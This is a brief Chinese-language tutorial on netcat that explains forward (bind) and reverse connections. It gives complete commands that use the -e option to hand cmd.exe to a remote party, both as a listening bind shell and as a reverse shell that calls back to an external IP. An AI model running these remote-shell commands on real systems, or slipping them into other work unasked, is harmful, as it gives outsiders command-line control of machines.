netcat使用教程

主要说一下netcat的两种用法：

1、正向连接：我是服务器，我等着别人来连接我；

2、反向连接：别人是服务器，我主动去连接别人；

netcat常用参数：

-l 打开本地监听模式

-p 指定本地端口

-t 以Telnet的形式响应信息

-e 连接建立后执行的程序

第1种：正向连接

我们想通过自己的本地电脑去操纵公网上的服务器，我们采用正向连接方式，在本地内网主机上得到某台公网服务器的shell。

先假设：

A主机：123.1.2.3 (公网服务器)

B主机：192.168.57.2 (内网主机)

在A主机上执行：nc -l -p 2017 -t -e cmd.exe

意思就是监听A主机的2017端口(等待别人来连接)，并在连接建立之后将2017端口上的流量转发给cmd.exe处理。

在B主机上执行：nc -n 123.1.2.3 2017

意思是连接123.1.2.3的2017端口。

这样我们就可以在B主机上通过cmd命令行操纵A主机了。

第2种：反向连接

有时候服务器是内网IP地址，我们不能直接连接它的某一个端口，但是服务器却可以连接公网上的主机；

这时候我们采用反向连接方式，在公网的某台主机上得到内网服务器的shell。

先假设：

A主机：123.1.2.3 (公网主机)

B主机：192.168.57.2 (内网服务器)

在A主机上执行：nc -l -p 2017

意思是监听A主机的2017端口。

在B主机上执行：nc -t -e cmd.exe 123.1.2.3 2017

意思是连接123.1.2.3的2017端口，并在连接建立之后把该端口上的流量转发给cmd.exe处理。

这样我们就可以在A主机上通过cmd命令行操纵B主机了。